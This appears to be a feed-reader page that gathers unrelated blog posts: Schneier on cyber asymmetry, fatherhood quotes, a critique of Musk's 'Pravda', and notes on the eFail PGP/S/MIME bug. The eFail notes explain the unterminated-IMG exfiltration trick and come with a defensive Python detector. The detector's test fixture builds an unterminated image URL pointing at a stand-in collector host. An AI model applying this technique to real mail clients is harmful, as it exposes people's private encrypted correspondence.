
Free Societies are at a Disadvantage in National Cybersecurity


Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:

It seeks to explain why the United States is struggling to deal with the "soft" cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society -- a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication -- create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.

I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don't matter to a totalitarian country. That makes us more vulnerable. (I don't mean to imply -- and neither do Russell and Goldsmith -- that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)

I do worry that these disadvantages will someday become intolerable. Dan Geer often said that "the price of freedom is the probability of crime." We are willing to pay this price because it isn't that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don't know.


Customer Rewards

We'll pay you $1.47 to post on social media about our products, $2.05 to mention it in any group chats you're in, and 11 cents per passenger each time you drive your office carpool past one of our billboards.
3 public comments
chrisrosa
9 days ago
reply
ouch...too real.
San Francisco, CA
sdevore
9 days ago
reply
oh this is the way my brain sees all these cards
Tucson, AZ

To Get Through to Your Teens, Text Them


Teenagers don’t enjoy talking to their parents. Actually, scratch that. Many don’t talk that much to their friends either, at least not with their voices. Teenagers like to text. Walk into any establishment where teens hang out and you will see them clumped together in small groups hovering over their cell phones.…

cheerfulscreech
10 days ago
reply
Is this insightful? Or just coddling? I worry that in a world where kids are growing up with insufficient social skills, this just reinforces the problem.
chemicalfacist
8 days ago
This is the world. In all honesty emojis will be incorporated into news articles and movies soon. The problem is people who refuse to adapt.

The Ultimate Collection of Quotes About Fatherhood


Fathers tend to be taken for granted.

We invariably make more of a fuss over Mom on Mother’s Day than Dad on Father’s Day, for one.

Dads are like a steady but less sentimentalized institution — the sun in our familial sky that warms and gives life but isn’t much thought about unless he goes missing.

Yet this belies the enormous impact fathers truly have on their children; while a dad’s nurturing may often take the form of playful roughhousing and silly jokes, his influence is quite serious and significant: the presence of a loving father greatly increases a child’s chances of success, confidence and resilience, physical and mental well-being, and yes, quite naturally, their sense of humor.

One of the manifestations of the way we take fathers for granted is that there exist many more quotes about Mom than dear old Dad (and even fewer about fathers and daughters). To make more accessible those great pearls of wisdom that do exist, we searched high and low for the very best, and created this ultimate treasury of quotes about fatherhood. These short quotations provide great prompts for reflection; typically, we’re so busy plowing ahead that we don’t pause to look up and get a “birds-eye” perspective on things — taking the time to ponder what our own dads meant to us, and the way we’re shaping, and should be savoring, our kids right now.   

Quotes About Fatherhood

“You don’t raise heroes, you raise sons. And if you treat them like sons, they’ll turn out to be heroes, even if it’s just in your own eyes.” –Walter M. Schirra, Sr. 

“Some dads liken the impending birth of a child to the beginning of a great journey.” –Marcus Jacob Goldman

“One father is more than a hundred schoolmasters.” –George Herbert

“Sherman made the terrible discovery that men make about their fathers sooner or later . . . that the man before him was not an aging father but a boy, a boy much like himself, a boy who grew up and had a child of his own and, as best he could, out of a sense of duty and, perhaps love, adopted a role called Being a Father so that his child would have something mythical and infinitely important: a Protector, who would keep a lid on all the chaotic and catastrophic possibilities of life.” –Tom Wolfe, The Bonfire of the Vanities

“The best way of training the young is to train yourself at the same time; not to admonish them, but to be seen never doing that of which you would admonish them.” –Plato

“The nature of impending fatherhood is that you are doing something that you’re unqualified to do, and then you become qualified while doing it.” –John Green

“One of the greatest things a father can do for his children is to love their mother.” –Howard W. Hunter

“To a father growing old nothing is dearer than a daughter.” –Euripides

“If there is any immortality to be had among us human beings, it is certainly only in the love that we leave behind. Fathers like mine don’t ever die.” –Leo Buscaglia

“That is the thankless position of the father in the family—the provider for all, and the enemy of all.” –J. August Strindberg

“Every father should remember one day his son will follow his example, not his advice.” –Charles Kettering

“Son, there are times a man has to do things he doesn’t like to, in order to protect his family.” –Ralph Moody

 “A boy needs a father to show him how to be in the world. He needs to be given swagger, taught how to read a map so that he can recognize the roads that lead to life and the paths that lead to death, how to know what love requires, and where to find steel in the heart when life makes demands on us that are greater than we think we can endure.” –Ian Morgan Cron

“Parenthood remains the single greatest preserve of the amateur.” –Alvin Toffler

“My father didn’t tell me how to live. He lived and let me watch him do it.” –Clarence Budington Kelland

“When you’re a dad, there’s no one above you. If I don’t do something that has to be done, who is going to do it?” –Jonathan Safran Foer, Here I Am

“‘Why do men like me want sons?’ he wondered. ‘It must be because they hope in their poor beaten souls that these new men, who are their blood, will do the things they were not strong enough nor wise enough nor brave enough to do. It is rather like another chance at life; like a new bag of coins at a table of luck after your fortune is gone.’” –John Steinbeck, Cup of Gold: A Life of Sir Henry Morgan, Buccaneer, with Occasional Reference to History

“If the past cannot teach the present, and the father cannot teach the son, then history need not have bothered to go on, and the world has wasted a great deal of time.” –Russell Hoban

“There are many kinds of success in life worth having. It is exceedingly interesting and attractive to be a successful business man, or railway man, or farmer, or a successful lawyer or doctor; or a writer, or a President, or a ranchman, or the colonel of a fighting regiment, or to kill grizzly bears and lions. But for unflagging interest and enjoyment, a household of children, if things go reasonably well, certainly makes all other forms of success and achievement lose their importance by comparison.” –Theodore Roosevelt

“Father!—To God Himself we cannot give a holier name.” –William Wordsworth

“We think our Fathers Fools, so wise we grow; Our wiser Sons, no doubt, will think us so.” –Alexander Pope

“His values embraced family, reveled in the social mingling of the kitchen, and above all, welcomed the loving disorder of children.” –John Cole

“Children are a poor man’s riches.” –English proverb

“It is easier to build strong children than to repair broken men.” –Frederick Douglass

“A girl’s father is the first man in her life, and probably the most influential.” –David Jeremiah

“Fathers, like mothers, are not born. Men grow into fathers and fathering is a very important stage in their development.” –David Gottesman

“Father of fathers, make me one,
A fit example for a son.”

–Douglas Malloch

“I believe that what we become depends on what our fathers teach us at odd moments, when they aren’t trying to teach us. We are formed by little scraps of wisdom.” –Umberto Eco 

“My father used to play with my brother and me in the yard. Mother would come out and say, ‘You’re tearing up the grass.’ ‘We’re not raising grass,’ Dad would reply. ‘We’re raising boys.’” –Harmon Killebrew

“Until you have a son of your own . . . you will never know the joy beyond joy, the love beyond feeling that resonates in the heart of a father as he looks upon his son. You will never know the sense of honor that makes a man want to be more than he is and to pass something good and hopeful into the hands of his son. And you will never know the heartbreak of the fathers who are haunted by the personal demons that keep them from being the men they want their sons to be.” –Kent Nerburn

“When my son looks up at me and breaks into his wonderful toothless smile, my eyes fill up and I know that having him is the best thing I will ever do.” –Dan Greenberg

“Being a great father is like shaving. No matter how good you shaved today, you have to do it again tomorrow.” –Reed Markham

“It is easier for a father to have children than for children to have a real father.” –Pope John XXIII

“When I looked at you first I saw not your mother and me, but your two grandfathers . . . and, as my father, whom I loved a great deal, had died the year before, I was moved to see that here, in you, he was alive.” –Peter Carey

“Dads are most ordinary men turned by love into heroes, adventurers, story-tellers, and singers of song.” –Pam Brown

“‘Father’ is the noblest title a man can be given. It is more than a biological role. It signifies a patriarch, a leader, an exemplar, a confidant, a teacher, a hero, a friend.” –Robert L. Backman 

“Noble fathers have noble children.” –Euripides

“The father who does not teach his son his duties is equally guilty with the son who neglects them.” –Confucius

“No man can possibly know what life means, what the world means, what anything means, until he has a child and loves it.” –Lafcadio Hearn

“I cannot think of any need in children as strong as the need for a father’s protection.” –Sigmund Freud

 “A father is a man who expects his son to be as good a man as he meant to be.” –Frank A. Clark

“His father watched him across the gulf of years and pathos which always divide a father from his son.” –John Marquand

“A family needs a father to anchor it.” –L. Tom Perry

“Words have an awesome impact. The impression made by a father’s voice can set in motion an entire trend of life.” –Gordon MacDonald

“Children need models rather than critics.” –Joseph Joubert 

“A father is someone you look up to no matter how tall you grow.” –Unknown

“Certain is it that there is no kind of affection so purely angelic as of a father to a daughter. In love to our wives there is desire; to our sons, ambition; but to our daughters there is something which there are no words to express.” –Joseph Addison

“Mostly you just have to keep plugging and keep loving—and hoping that your child forgives you according to how you loved him, judged him, forgave him, and stood watching over him as he slept, year after year.” –Ben Stein

“Life doesn’t come with an instruction book — that’s why we have fathers.” –H. Jackson Browne

“Fathers, you are your daughter’s hero. My father was my hero. I used to wait on the steps of our home for him to arrive each night. He would pick me up and twirl me around and let me put my feet on top of his big shoes, and then he would dance me into the house. I loved the challenge of trying to follow his every footstep. I still do.” –Elaine S. Dalton

“A good father is one of the most unsung, unpraised, unnoticed, and yet one of the most valuable assets in our society.” –Billy Graham

“When you teach your son, you teach your son’s son.” –The Talmud

“My father always said there are four things a child needs: plenty of love, nourishing food, regular sleep, and lots of soap and water. After that, what he needs most is some intelligent neglect.” –Ivy Baker Priest

“Like so much between fathers and sons, playing catch was tender and tense at the same time.” –Donald Hall

“By profession I am a soldier and take great pride in that fact, but I am also prouder, infinitely prouder, to be a father. A soldier destroys in order to build; the father only builds, never destroys.” –General Douglas MacArthur

“The lone father is not a strong father. Fathering is a difficult and perilous journey and is done well with the help of other men.” –John L. Hart

“Children of the new millennium when change is likely to continue and stress will be inevitable, are going to need, more than ever, the mentoring of an available father.” –Ian Grant

“The quality of a father can be seen in the goals, dreams, and aspirations he sets not only for himself, but for his family.” –Reed Markham

“Fathering is not something perfect men do, but something that perfects the man.” –Frank Pittman

“Never fret for an only son. The idea of failure will never occur to him.” –George Bernard Shaw

“My son is seven years old. I am fifty-four. It has taken me a great many years to reach that age. I am more respected in the community, I am stronger, I am more intelligent and I think I am better than he is. I don’t want to be his pal, I want to be a father.” –Clifton Fadiman

“Some day you will know that a father is much happier in his children’s happiness than in his own. I cannot explain it to you: it is a feeling in your body that spreads gladness through you.” –Honore de Balzac, Pere Goriot

“A child enters your home and for the next twenty years makes so much noise you can hardly stand it. The child departs, leaving the house so silent you think you are going mad.” –John Andrew Holmes

“Every parent is at some point the father of the unreturned prodigal, with nothing to do but keep his house open to hope.” –John Ciardi

The post The Ultimate Collection of Quotes About Fatherhood appeared first on The Art of Manliness.


Some notes on eFail

I've been busy trying to replicate the "eFail" PGP/SMIME bug. I thought I'd write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can't read them. The bugs potentially allow eavesdroppers to take the encrypted emails they've captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable "external" or "remote" content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when senders want to display images but not fill up the email with them. But most of the time it is illegitimate: they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and that the width/height of this image is set to one pixel, so you don't even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:


The problem is that as you read email messages, you often get frustrated by the error messages and missing content, so you keep adding exceptions:


The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren't to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn't matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That's probably overkill. As long as the attacker can't use the "remote content" in emails, you are fine. Likewise, some have recommended disabling HTML completely. That's not even an option in any email client I've used -- you can disable sending HTML emails, but not receiving them. It's sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn't replicate the direct exfiltration

There are two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/...) but doesn't end it. It has the starting quotes in front of the URL but no ending quotes. The ending will be in the next chunk.

The next chunk isn't HTML, though, it's PGP. The PGP extension (in my case, Enigmail) will detect this and automatically decrypt it. In this case, it's some previous email message I've received that the attacker captured by eavesdropping; the attacker then pastes the contents into this email message in order to get it decrypted.



What should happen at this point is that Thunderbird will generate a request (if "remote content" is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that's not what happens. Instead, I get this:


I am indeed getting weird stuff in the URL (the bit after the GET /), but it's not the PGP decrypted message. Instead what's going on is that when Thunderbird puts together a "multipart/mixed" message, it adds its own HTML tags consisting of lines between each part. In the email client it looks like this:


The HTML code it adds looks like:

That's what you see in the above URL, all this code up to the first quotes. Those quotes terminate the quotes in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have "remote content" enabled. Though this is only according to my tests; there may be a workaround to this that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via "STARTTLS", which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.

Some organizations don't care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won't actively intercept STARTTLS messages, for fear of getting caught.

The consequence is that it's much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).

You'll know if you are getting hacked

If somebody attacks you using eFail, you'll know. You'll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you'll be attacked only once -- the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn't necessarily that you'll only get one decrypted.

As mentioned above, a lot of attackers (e.g. the NSA) won't attack you if it's so easy to get caught. Other attackers, though, like anonymous hackers, don't care.

Somebody ought to write a plugin to Thunderbird to detect this.
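The check this section asks for can be run over the raw message before it is rendered. The following is an added example, not code from the original post or from Thunderbird or Enigmail: it walks the MIME parts and flags an HTML part that opens a URL quote without closing it, noting when an encrypted part follows. The function names, the `example.invalid` hosts and both sample messages are constructed for illustration.

```python
import re
from email import message_from_string

PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"
ENCRYPTED_TYPES = {
    "application/pgp-encrypted",  # PGP/MIME
    "application/pkcs7-mime",     # S/MIME
    "application/x-pkcs7-mime",
}
# An HTML attribute that makes the client fetch a URL, up to its opening quote.
URL_ATTR = re.compile(r"""\b(?:src|href|background)\s*=\s*(["'])""", re.IGNORECASE)


def part_text(part):
    """Decoded body of a leaf MIME part as text (empty if it has no body)."""
    raw = part.get_payload(decode=True)
    if raw is None:
        return ""
    try:
        return raw.decode(part.get_content_charset() or "utf-8", errors="replace")
    except LookupError:  # unknown charset label in the header
        return raw.decode("latin-1")


def dangling_url_attr(html):
    """True if some URL attribute opens a quote that is never closed in this part."""
    return any(html.find(m.group(1), m.end()) == -1 for m in URL_ATTR.finditer(html))


def is_encrypted(part):
    """True for PGP/MIME and S/MIME parts, and for inline ASCII-armored PGP."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return part.get_content_maintype() == "text" and PGP_ARMOR in part_text(part)


def efail_findings(raw_message):
    """Return a list of findings for one raw message; empty means nothing flagged."""
    msg = message_from_string(raw_message)
    leaves = [p for p in msg.walk() if not p.is_multipart()]  # document order
    findings = []
    for i, part in enumerate(leaves):
        if part.get_content_type() != "text/html":
            continue
        if not dangling_url_attr(part_text(part)):
            continue
        follower = leaves[i + 1] if i + 1 < len(leaves) else None
        if follower is not None and is_encrypted(follower):
            findings.append(
                f"part {i}: unterminated URL attribute followed by encrypted part {i + 1}")
        else:
            findings.append(f"part {i}: unterminated URL attribute (malformed HTML)")
    return findings


def build_sample(html_body):
    """Constructed message: one HTML part followed by an inline PGP part."""
    return (
        "From: sender@example.invalid\n"
        "To: me@example.invalid\n"
        "Subject: constructed sample\n"
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="BOUNDARY"\n'
        "\n"
        "--BOUNDARY\nContent-Type: text/html\n\n"
        f"{html_body}\n"
        "--BOUNDARY\nContent-Type: text/plain\n\n"
        "-----BEGIN PGP MESSAGE-----\n\n"
        "(placeholder, not real ciphertext)\n"
        "-----END PGP MESSAGE-----\n"
        "--BOUNDARY--\n"
    )


# Constructed inputs: the first leaves the quote open across the part boundary,
# the second is well-formed HTML that merely sits next to an encrypted part.
SAMPLE_SUSPICIOUS = build_sample('<img src="http://collector.example.invalid/')
SAMPLE_BENIGN = build_sample('<p>Hi <img src="https://static.example.invalid/logo.png"></p>')

if __name__ == "__main__":
    print(efail_findings(SAMPLE_SUSPICIOUS))
    print(efail_findings(SAMPLE_BENIGN))
```

The check keys on the open quote rather than on the mere presence of encrypted parts, so ordinary mail that mixes HTML and PGP is not flagged.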

Summary

It only works if attackers have already captured your emails (though, that's why you use PGP/SMIME in the first place, to guard against that).

It only works if you've enabled your email client to automatically grab external/remote content.

It seems to not be easily reproducible in all cases.

Instead of disabling PGP/SMIME, you should make sure your email client has remote/external content disabled -- that's a huge privacy violation even without this bug.





Notes: The default email client on the Mac enables remote content by default, which is bad:



The devil wears Pravda

Classic Bond villain, Elon Musk, has a new plan to create a website dedicated to measuring the credibility and adherence to "core truth" of journalists. He is, without any sense of irony, going to call this "Pravda". This is not simply wrong but evil.


Musk has a point. Journalists do suck, and many suck consistently. I see this in my own industry, cybersecurity, and I frequently criticize them for their suckage.

But what he's doing here is not correcting them when they make mistakes (or what Musk sees as mistakes), but questioning their legitimacy. This legitimacy isn't measured by whether they follow established journalism ethics, but whether their "core truths" agree with Musk's "core truths".

An example of the problem is how the press fixates on Tesla car crashes due to its "autopilot" feature. Pretty much every autopilot crash makes national headlines, while the press ignores the other 40,000 car crashes that happen in the United States each year. Musk spies on Tesla drivers (hello, classic Bond villain everyone) so he can see the dip in autopilot usage every time such a news story breaks. He's got good reason to be concerned about this.

He argues that autopilot is safer than humans driving, and he's got the statistics and government studies to back this up. Therefore, the press's fixation on Tesla crashes is illegitimate "fake news", titillating the audience with distorted truth.

But here's the thing: that's still only Musk's version of the truth. Yes, on a mile-per-mile basis, autopilot is safer, but there's nuance here. Autopilot is used primarily on freeways, which already have a low mile-per-mile accident rate. People choose autopilot only when conditions are incredibly safe and drivers are unlikely to have an accident anyway. Musk is therefore being intentionally deceptive comparing apples to oranges. Autopilot may still be safer, it's just that the numbers Musk uses don't demonstrate this.

And then there is the truth of calling it "autopilot" to begin with, because it isn't. The public is overrating the capabilities of the feature. It's little different than the "lane keeping" and "adaptive cruise control" you can now find in other cars. In many ways, the technology is behind -- my Tesla doesn't beep at me when a pedestrian walks behind my car while backing up, but virtually every new car on the market does.

Yes, the press unduly covers Tesla autopilot crashes, but Musk has only himself to blame by unduly exaggerating his car's capabilities by calling it "autopilot".

What's "core truth" is thus rather difficult to obtain. What the press satisfies itself with instead is smaller truths, what they can document. The facts are in such cases that the accident happened, and they try to get Tesla or Musk to comment on it.

What you can criticize a journalist for is therefore not "core truth" but whether they did journalism correctly. When such stories criticize "autopilot", but don't do their diligence in getting Tesla's side of the story, then that's a violation of journalistic practice. When I criticize journalists for their poor handling of stories in my industry, I try to focus on which journalistic principles they get wrong. For example, the NYTimes reporters do a lot of stories quoting anonymous government sources in clear violation of journalistic principles.

If "credibility" is the concern, then it's the classic Bond villain here that's the problem: Musk himself. His track record on business statements is abysmal. For example, when he announced the Model 3 he claimed production targets that every Wall Street analyst claimed were absurd. He didn't make those targets, he didn't come close. Model 3 production is still lagging behind Musk's twice adjusted targets.

https://www.bloomberg.com/graphics/2018-tesla-tracker/

So who has a credibility gap here, the press, or Musk himself?

Not only is Musk's credibility problem ironic, so is the name he chose, "Pravda", the Russian word for truth that was the name of the Soviet Union Communist Party's official newspaper. This is so absurd this has to be a joke, yet Musk claims to be serious about all this.

Yes, the press has a lot of problems, and if Musk were some journalism professor concerned about journalists meeting the objective standards of their industry (e.g. abusing anonymous sources), then this would be a fine thing. But it's not. It's Musk who is upset the press's version of "core truth" does not agree with his version -- a version that he's proven time and time again differs from "real truth".

Just in case Musk is serious, I've already registered "www.antipravda.com" to start measuring the credibility of statements by billionaire playboy CEOs. Let's see who blinks first.



I stole the title, with permission, from this tweet:


